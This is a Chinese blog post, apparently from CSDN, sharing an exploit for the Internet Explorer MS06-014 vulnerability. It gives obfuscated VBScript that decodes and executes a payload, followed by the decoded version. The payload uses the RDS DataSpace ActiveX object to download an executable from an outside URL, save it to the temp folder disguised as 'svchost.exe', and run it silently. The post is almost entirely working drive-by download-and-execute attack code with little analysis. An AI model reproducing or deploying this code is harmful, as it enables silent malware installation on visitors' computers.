IE MS06014漏洞share一下

最新推荐文章于 2022-11-08 11:16:06 发布

pengdawei521

最新推荐文章于 2022-11-08 11:16:06 发布

阅读量451

点赞数

分类专栏： AntiVirus &amp; Reverse 文章标签： ie path bbs vbscript stream function

本文链接：https://blog.csdn.net/pengdawei521/article/details/1843381

版权

AntiVirus & Reverse 专栏收录该内容

30 篇文章 0 订阅

订阅专栏

密码：
<script language="VBScript">
    'Option Explicit
    function Decode(k)
        dim s,t,i
        s=Split(k," ")
        t=""
        For i = 0 To UBound(s)
        t=t+Chr(s(i))
        Next
        Decode=t
    End Function

    dim str1,str2,path

    path="http://blog.csdn.net/pengdawei521/test.exe"
    str1="111 110 32 101 114 114 111 114 32 114 101 115 117 109 101 32 110 101 120 116 13 10 100 105 109 32 68 97 116 97 115 112 97 99 101 44 88 77 76 72 84 84 80 44 83 116 114 101 97 109 44 70 105 108 101 83 121 115 116 101 109 79 98 106 101 99 116 44 70 111 108 100 101 114 79 98 106 101 99 116 44 65 112 112 108 105 99 97 116 105 111 110 79 98 106 101 99 116 13 10 100 105 109 32 80 97 116 104 44 66 66 83 13 10 83 101 116 32 68 97 116 97 115 112 97 99 101 32 61 32 100 111 99 117 109 101 110 116 46 99 114 101 97 116 101 69 108 101 109 101 110 116 40 34 111 98 106 101 99 116 34 41 13 10 68 97 116 97 115 112 97 99 101 46 115 101 116 65 116 116 114 105 98 117 116 101 32 34 99 108 97 115 115 105 100 34 44 32 34 99 108 115 105 100 58 66 68 57 54 67 53 53 54 45 54 53 65 51 45 49 49 68 48 45 57 56 51 65 45 48 48 67 48 52 70 67 50 57 69 51 54 34 13 10 83 101 116 32 88 77 76 72 84 84 80 32 61 32 68 97 116 97 115 112 97 99 101 46 67 114 101 97 116 101 79 98 106 101 99 116 40 34 77 105 99 114 111 115 111 102 116 46 88 77 76 72 84 84 80 34 44 34 34 41 13 10 115 101 116 32 83 116 114 101 97 109 32 61 32 68 97 116 97 115 112 97 99 101 46 99 114 101 97 116 101 111 98 106 101 99 116 40 34 65 100 111 100 98 46 83 116 114 101 97 109 34 44 34 34 41 13 10 115 101 116 32 70 105 108 101 83 121 115 116 101 109 79 98 106 101 99 116 32 61 32 68 97 116 97 115 112 97 99 101 46 99 114 101 97 116 101 111 98 106 101 99 116 40 34 83 99 114 105 112 116 105 110 103 46 70 105 108 101 83 121 115 116 101 109 79 98 106 101 99 116 34 44 34 34 41 13 10 115 101 116 32 70 111 108 100 101 114 79 98 106 101 99 116 32 61 32 70 105 108 101 83 121 115 116 101 109 79 98 106 101 99 116 46 71 101 116 83 112 101 99 105 97 108 70 111 108 100 101 114 40 50 41 13 10 115 101 116 32 65 112 112 108 105 99 97 116 105 111 110 79 98 106 101 99 116 32 61 32 68 97 116 97 115 112 97 99 101 46 99 114 101 97 116 101 111 98 106 101 99 116 40 34 83 104 101 108 108 46 65 112 112 108 105 99 97 116 105 111 110 34 44 34 34 41 13 10 80 97 116 104 61 32 70 105 108 101 83 121 115 116 101 109 79 98 106 101 99 116 46 66 117 105 108 100 80 97 116 104 40 70 111 108 100 101 114 79 98 106 101 99 116 44 34 115 118 99 104 111 115 116 46 101 120 101 34 41 13 10 83 116 114 101 97 109 46 116 121 112 101 32 61 32 49 13 10 88 77 76 72 84 84 80 46 79 112 101 110 32 34 71 69 84 34 44"
    str2="44 32 70 97 108 115 101 13 10 88 77 76 72 84 84 80 46 83 101 110 100 13 10 13 10 83 116 114 101 97 109 46 111 112 101 110 13 10 83 116 114 101 97 109 46 119 114 105 116 101 32 88 77 76 72 84 84 80 46 114 101 115 112 111 110 115 101 66 111 100 121 13 10 83 116 114 101 97 109 46 115 97 118 101 116 111 102 105 108 101 32 80 97 116 104 44 50 13 10 83 116 114 101 97 109 46 99 108 111 115 101 13 10 13 10 65 112 112 108 105 99 97 116 105 111 110 79 98 106 101 99 116 46 83 104 101 108 108 69 120 101 99 117 116 101 32 80 97 116 104 44 66 66 83 44 66 66 83 44 34 111 112 101 110 34 44 48"
    str1=Decode(str1)
    str1=str1 + """" + path + """"
    str1=str1 + Decode(str2)
    execute(str1)
</script>

解码：
on error resume next
dim Dataspace,XMLHTTP,Stream,FileSystemObject,FolderObject,ApplicationObject
dim Path,BBS
Set Dataspace = document.createElement("object")
Dataspace.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set XMLHTTP = Dataspace.CreateObject("Microsoft.XMLHTTP","")
set Stream = Dataspace.createobject("Adodb.Stream","")
set FileSystemObject = Dataspace.createobject("Scripting.FileSystemObject","")
set FolderObject = FileSystemObject.GetSpecialFolder(2)
set ApplicationObject = Dataspace.createobject("Shell.Application","")
Path= FileSystemObject.BuildPath(FolderObject,"svchost.exe")
Stream.type = 1
XMLHTTP.Open "GET","http://blog.csdn.net/pengdawei521/test.exe", False'   *_*
XMLHTTP.Send

Stream.open
Stream.write XMLHTTP.responseBody
Stream.savetofile Path,2
Stream.close

ApplicationObject.ShellExecute Path,BBS,BBS,"open",0

pengdawei521

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
IE MS06014漏洞share一下

密码： Option Explicit function Decode(k) dim s,t,i s=Split(k," ") t="" For i = 0 To UBound(s) t=t+Chr(s(i)) Next Decode=t End Function
复制链接

扫一扫